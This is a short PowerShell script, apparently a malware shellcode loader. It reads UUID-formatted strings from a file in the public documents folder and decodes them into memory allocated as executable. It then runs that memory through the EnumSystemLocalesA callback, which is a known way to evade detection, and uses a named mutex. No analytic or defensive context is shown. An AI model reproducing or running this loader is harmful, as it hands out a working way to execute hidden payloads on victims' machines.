add-type "using System;using System.Runtime.InteropServices;[StructLayout(LayoutKind.Sequential)]public static class Kernel32{[DllImport(""kernel32.dll"")]public static extern IntPtr VirtualAlloc(IntPtr address,int size,int AllocType,int protect);[DllImport(""kernel32.dll"")]public static extern bool EnumSystemLocalesA(IntPtr buf, uint flags);}public static class Rpcrt4{[DllImport(""rpcrt4.dll"")]public static extern void UuidFromStringA(string uuid, IntPtr buf);}";$lines=[System.IO.File]::ReadAllLines("C:\Users\Public\Documents\sh_z.txt");$buf=[Kernel32]::VirtualAlloc([IntPtr]::Zero,$lines.Length*16,0x1000,0x40);$CreatedNew = $false;$Mutex = New-Object System.Threading.Mutex($false, "p99a0e7d974aba6f", [ref]$CreatedNew);$proc=$buf;foreach($line in $lines){$tmp=[Rpcrt4]::UuidFromStringA($line, $buf);$buf=[IntPtr]($buf.ToInt64()+16)}[Kernel32]::EnumSystemLocalesA($proc,0);